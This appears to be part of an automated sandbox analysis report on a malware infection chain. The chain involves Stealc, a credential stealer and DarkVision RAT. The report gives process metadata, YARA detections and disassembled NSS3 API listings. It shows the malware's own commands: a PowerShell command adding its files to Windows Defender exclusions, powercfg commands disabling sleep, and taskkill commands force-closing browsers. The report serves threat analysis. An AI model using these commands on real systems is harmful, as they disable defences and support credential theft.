Path:	C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe"
Imagebase:	0x1e0000
File size:	1'856'512 bytes
MD5 hash:	78CBDC5E45F97CA8C6E6E72D99BD5BF1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000022.00000003.2847457804.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000022.00000003.2753152898.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000022.00000003.2728825814.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 37%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	35
Start time:	13:53:48
Start date:	08/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe"
Imagebase:	0x3e0000
File size:	1'806'336 bytes
MD5 hash:	807928C7C8D81BF2C9F4AB5BA2F4763B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000023.00000002.2874624996.00000000003E1000.00000040.00000001.01000000.0000001B.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000023.00000003.2780250709.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000023.00000002.2876580011.000000000107E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 45%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	13:53:49
Start date:	08/12/2024
Path:	C:\Users\user\AppData\Local\Temp\downloaded_file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\downloaded_file.exe"
Imagebase:	0x8d0000
File size:	515'584 bytes
MD5 hash:	D60C9E070239F8C240AAA6D8832E11EF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000024.00000003.2763632421.0000000001200000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000024.00000003.2763632421.0000000001200000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000024.00000002.2768909710.0000000000902000.00000002.00000001.01000000.0000001C.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000024.00000002.2768909710.0000000000902000.00000002.00000001.01000000.0000001C.sdmp, Author: Joe Security Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000024.00000000.2762140149.0000000000902000.00000002.00000001.01000000.0000001C.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000024.00000000.2762140149.0000000000902000.00000002.00000001.01000000.0000001C.sdmp, Author: Joe Security Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000024.00000002.2770761069.00000000011FB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000024.00000002.2770761069.00000000011FB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	13:53:49
Start date:	08/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'
Imagebase:	0x7ff674580000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	13:53:49
Start date:	08/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	13:53:49
Start date:	08/12/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\explorer.exe"
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000027.00000002.2956530663.0000000002E08000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000027.00000002.2956530663.0000000002E08000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	40
Start time:	13:53:49
Start date:	08/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	13:53:54
Start date:	08/12/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\EXPLORER.EXE {DF4EE2DA-C20C-4BBF-97D5-4B94E23FE1C8}
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	42
Start time:	13:53:55
Start date:	08/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1013251001\5e54822fbe.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1013251001\5e54822fbe.exe"
Imagebase:	0xd00000
File size:	971'264 bytes
MD5 hash:	EF28C394DDDD56CEBAD7E246ABB81976
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 18%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	43
Start time:	13:53:55
Start date:	08/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe"
Imagebase:	0x1e0000
File size:	1'856'512 bytes
MD5 hash:	78CBDC5E45F97CA8C6E6E72D99BD5BF1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002B.00000002.2957653821.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	44
Start time:	13:53:57
Start date:	08/12/2024
Path:	C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe" ""
Imagebase:	0x7ff6aa270000
File size:	2'576'896 bytes
MD5 hash:	D16E6918118A615A302759477165E256
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	13:53:58
Start date:	08/12/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Imagebase:	0x7ff74b330000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	13:53:58
Start date:	08/12/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Imagebase:	0x7ff74b330000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	13:53:58
Start date:	08/12/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Imagebase:	0x7ff74b330000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	13:53:58
Start date:	08/12/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Imagebase:	0x7ff74b330000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	13:53:58
Start date:	08/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	13:53:58
Start date:	08/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	13:53:58
Start date:	08/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	13:53:58
Start date:	08/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	13:53:58
Start date:	08/12/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	explorer.exe
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	54
Start time:	13:53:59
Start date:	08/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM firefox.exe /T
Imagebase:	0x180000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	13:53:59
Start date:	08/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	13:54:01
Start date:	08/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM chrome.exe /T
Imagebase:	0x7ff72bec0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	13:54:01
Start date:	08/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	13:54:02
Start date:	08/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM msedge.exe /T
Imagebase:	0x180000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	13:54:02
Start date:	08/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	13:54:02
Start date:	08/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM opera.exe /T
Imagebase:	0x180000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	13:54:02
Start date:	08/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 6C5B6E90 Relevance: 142.5, APIs: 71, Strings: 10, Instructions: 783stringmemoryCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C702120,6C5B7E60), ref: 6C5B6EBC
TlsGetValue.KERNEL32 ref: 6C5B6EDF
EnterCriticalSection.KERNEL32(?), ref: 6C5B6EF3
PR_WaitCondVar.NSS3(000000FF), ref: 6C5B6F25

Part of subcall function 6C58A900: TlsGetValue.KERNEL32(00000000,?,6C7014E4,?,6C524DD9), ref: 6C58A90F
Part of subcall function 6C58A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C58A94F

PR_Unlock.NSS3 ref: 6C5B6F68
PORT_ZAlloc_Util.NSS3(00000008), ref: 6C5B6FA9
TlsGetValue.KERNEL32 ref: 6C5B70B4
EnterCriticalSection.KERNEL32(?), ref: 6C5B70C8
PR_CallOnce.NSS3(6C7024C0,6C5F7590), ref: 6C5B7104
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5B7117
SECOID_Init.NSS3 ref: 6C5B7128
PORT_Alloc_Util.NSS3(00000057), ref: 6C5B714E
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5B717F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5B71A9
PR_NotifyAllCondVar.NSS3 ref: 6C5B71CF
PR_Unlock.NSS3 ref: 6C5B71DD
free.MOZGLUE(?), ref: 6C5B71EE
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5B7208
free.MOZGLUE(00000000), ref: 6C5B7221
free.MOZGLUE(00000001), ref: 6C5B7235
TlsGetValue.KERNEL32 ref: 6C5B724A
EnterCriticalSection.KERNEL32(?), ref: 6C5B725E
PR_NotifyCondVar.NSS3 ref: 6C5B7273
PR_Unlock.NSS3 ref: 6C5B7281
SECMOD_DestroyModule.NSS3(00000000), ref: 6C5B7291
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5B72B1
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5B72D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5B72E3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5B7301
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5B7310
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5B7335
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5B7344
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5B7363
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5B7372
PR_smprintf.NSS3(name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s",NSS Internal Module,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,6C6F0148,,defaultModDB,internalKeySlot), ref: 6C5B74CC
free.MOZGLUE(00000000), ref: 6C5B7513
free.MOZGLUE(00000000), ref: 6C5B751B
free.MOZGLUE(00000000), ref: 6C5B7528
free.MOZGLUE(00000000), ref: 6C5B753C
free.MOZGLUE(00000000), ref: 6C5B7550
free.MOZGLUE(00000000), ref: 6C5B7561
free.MOZGLUE(00000000), ref: 6C5B7572
free.MOZGLUE(00000000), ref: 6C5B7583
free.MOZGLUE(00000000), ref: 6C5B7594
free.MOZGLUE(00000000), ref: 6C5B75A2
SECMOD_LoadModule.NSS3(00000000,00000000,00000001), ref: 6C5B75BD
free.MOZGLUE(00000000), ref: 6C5B75C8
free.MOZGLUE(00000000), ref: 6C5B75F1
PR_NewLock.NSS3 ref: 6C5B7636
SECMOD_DestroyModule.NSS3(00000000), ref: 6C5B7686
PR_NewLock.NSS3 ref: 6C5B76A2

Part of subcall function 6C6698D0: calloc.MOZGLUE(00000001,00000084,6C590936,00000001,?,6C59102C), ref: 6C6698E5

PORT_ZAlloc_Util.NSS3(00000050), ref: 6C5B76B6
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004), ref: 6C5B7707
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C5B771C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C5B7731
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,rdb:,00000004), ref: 6C5B774A
DeleteCriticalSection.KERNEL32(?), ref: 6C5B7770
free.MOZGLUE(?), ref: 6C5B7779
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5B779A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5B77AC
PORT_Alloc_Util.NSS3(-0000000D), ref: 6C5B77C4
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C5B77DB
strrchr.VCRUNTIME140(?,0000002F), ref: 6C5B7821
PORT_Alloc_Util.NSS3(?), ref: 6C5B7837
memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6C5B785B
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C5B786F
SECMOD_AddNewModuleEx.NSS3 ref: 6C5B78AC
free.MOZGLUE(00000000), ref: 6C5B78BE
SECMOD_AddNewModuleEx.NSS3 ref: 6C5B78F3
free.MOZGLUE(00000000), ref: 6C5B78FC
free.MOZGLUE(00000000), ref: 6C5B791C

Part of subcall function 6C5907A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C52204A), ref: 6C5907AD
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C52204A), ref: 6C5907CD
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C52204A), ref: 6C5907D6
Part of subcall function 6C5907A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C52204A), ref: 6C5907E4
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,6C52204A), ref: 6C590864
Part of subcall function 6C5907A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C590880
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,?,6C52204A), ref: 6C5908CB
Part of subcall function 6C5907A0: TlsGetValue.KERNEL32(?,?,6C52204A), ref: 6C5908D7
Part of subcall function 6C5907A0: TlsGetValue.KERNEL32(?,?,6C52204A), ref: 6C5908FB

Strings

Spac, xrefs: 6C5B7389
,defaultModDB,internalKeySlot, xrefs: 6C5B748D, 6C5B74AA
NSS Internal Module, xrefs: 6C5B74A2, 6C5B74C6
dll, xrefs: 6C5B788E
name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s", xrefs: 6C5B74C7
extern:, xrefs: 6C5B772B
rdb:, xrefs: 6C5B7744
sql:, xrefs: 6C5B76FE
kbi., xrefs: 6C5B7886
dbm:, xrefs: 6C5B7716

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: free$strlen$Value$Alloc_ModuleUtil$CriticalSectionstrncmp$CondEnterUnlockcallocmemcpy$CallDestroyErrorLockNotifyOnce$DeleteInitLoadR_smprintfWaitstrrchr
String ID: ,defaultModDB,internalKeySlot$NSS Internal Module$Spac$dbm:$dll$extern:$kbi.$name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s"$rdb:$sql:
API String ID: 3465160547-3797173233
Opcode ID: 87425393d6df32b88e0efa81c8344aeab50e34d860c56444b3b3d1f991a0c996
Instruction ID: 2034c2ebb4e4e704aae6566be3aead89b93073f8681d49faec92bd5d24509126
Opcode Fuzzy Hash: 87425393d6df32b88e0efa81c8344aeab50e34d860c56444b3b3d1f991a0c996
Instruction Fuzzy Hash: 4C5213B1E01301ABEF108F64DC55BAE7FB4AF06388F144429EC1AB6B41EB71D954CBA5

Function 6C5DBFF0 Relevance: 75.9, APIs: 31, Strings: 12, Instructions: 624memorystringCOMMON

Download Yara Rule

APIs

PR_ExitMonitor.NSS3 ref: 6C5DC0C8

Part of subcall function 6C669440: LeaveCriticalSection.KERNEL32 ref: 6C6695CD
Part of subcall function 6C669440: TlsGetValue.KERNEL32 ref: 6C669622
Part of subcall function 6C669440: _PR_MD_NOTIFYALL_CV.NSS3 ref: 6C66964E

PR_EnterMonitor.NSS3 ref: 6C5DC0AE

Part of subcall function 6C669090: LeaveCriticalSection.KERNEL32 ref: 6C6691AA
Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C669212
Part of subcall function 6C669090: _PR_MD_WAIT_CV.NSS3 ref: 6C66926B

Part of subcall function 6C590600: GetLastError.KERNEL32(?,?,?,?,?,6C5905E2), ref: 6C590642
Part of subcall function 6C590600: TlsGetValue.KERNEL32(?,?,?,?,?,6C5905E2), ref: 6C59065D
Part of subcall function 6C590600: GetLastError.KERNEL32 ref: 6C590678
Part of subcall function 6C590600: PR_snprintf.NSS3(?,00000014,error %d,00000000), ref: 6C59068A
Part of subcall function 6C590600: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C590693
Part of subcall function 6C590600: PR_SetErrorText.NSS3(00000000,?), ref: 6C59069D
Part of subcall function 6C590600: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CDC03278,?,?,?,?,?,6C5905E2), ref: 6C5906CA
Part of subcall function 6C590600: PR_SetError.NSS3(FFFFE8A9,00000000,?,?,?,?,?,6C5905E2), ref: 6C5906E6

PR_EnterMonitor.NSS3 ref: 6C5DC0F2
PR_ExitMonitor.NSS3 ref: 6C5DC10E
PR_ExitMonitor.NSS3 ref: 6C5DC081

Part of subcall function 6C669440: TlsGetValue.KERNEL32 ref: 6C66945B
Part of subcall function 6C669440: TlsGetValue.KERNEL32 ref: 6C669479
Part of subcall function 6C669440: EnterCriticalSection.KERNEL32 ref: 6C669495
Part of subcall function 6C669440: TlsGetValue.KERNEL32 ref: 6C6694E4
Part of subcall function 6C669440: TlsGetValue.KERNEL32 ref: 6C669532
Part of subcall function 6C669440: LeaveCriticalSection.KERNEL32 ref: 6C66955D

PR_EnterMonitor.NSS3 ref: 6C5DC068

Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C6690AB
Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C6690C9
Part of subcall function 6C669090: EnterCriticalSection.KERNEL32 ref: 6C6690E5
Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C669116
Part of subcall function 6C669090: LeaveCriticalSection.KERNEL32 ref: 6C66913F

Part of subcall function 6C590600: GetProcAddress.KERNEL32(?,?), ref: 6C590623

_NSSUTIL_UTF8ToWide.NSS3(?), ref: 6C5DC14F
PR_LoadLibraryWithFlags.NSS3 ref: 6C5DC183
free.MOZGLUE(00000000), ref: 6C5DC18E
PR_LoadLibrary.NSS3(?), ref: 6C5DC1A3
PR_EnterMonitor.NSS3 ref: 6C5DC1D4
PR_ExitMonitor.NSS3 ref: 6C5DC1F3
PR_CallOnce.NSS3(6C702318,6C5DCA70), ref: 6C5DC210
PR_EnterMonitor.NSS3 ref: 6C5DC22B
PR_ExitMonitor.NSS3 ref: 6C5DC247
PR_EnterMonitor.NSS3 ref: 6C5DC26A
PR_ExitMonitor.NSS3 ref: 6C5DC287
PR_UnloadLibrary.NSS3(?), ref: 6C5DC2D0
PR_GetEnvSecure.NSS3(NSS_DEBUG_PKCS11_MODULE), ref: 6C5DC392
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C5DC3AB
PR_NewLogModule.NSS3(nss_mod_log), ref: 6C5DC3D1
PR_GetEnvSecure.NSS3(NSS_FORCE_TOKEN_LOCK), ref: 6C5DC782
PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD), ref: 6C5DC7B5
PR_UnloadLibrary.NSS3(?), ref: 6C5DC7CC
PR_SetError.NSS3(FFFFE097,00000000), ref: 6C5DC82E
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C5DC8BF
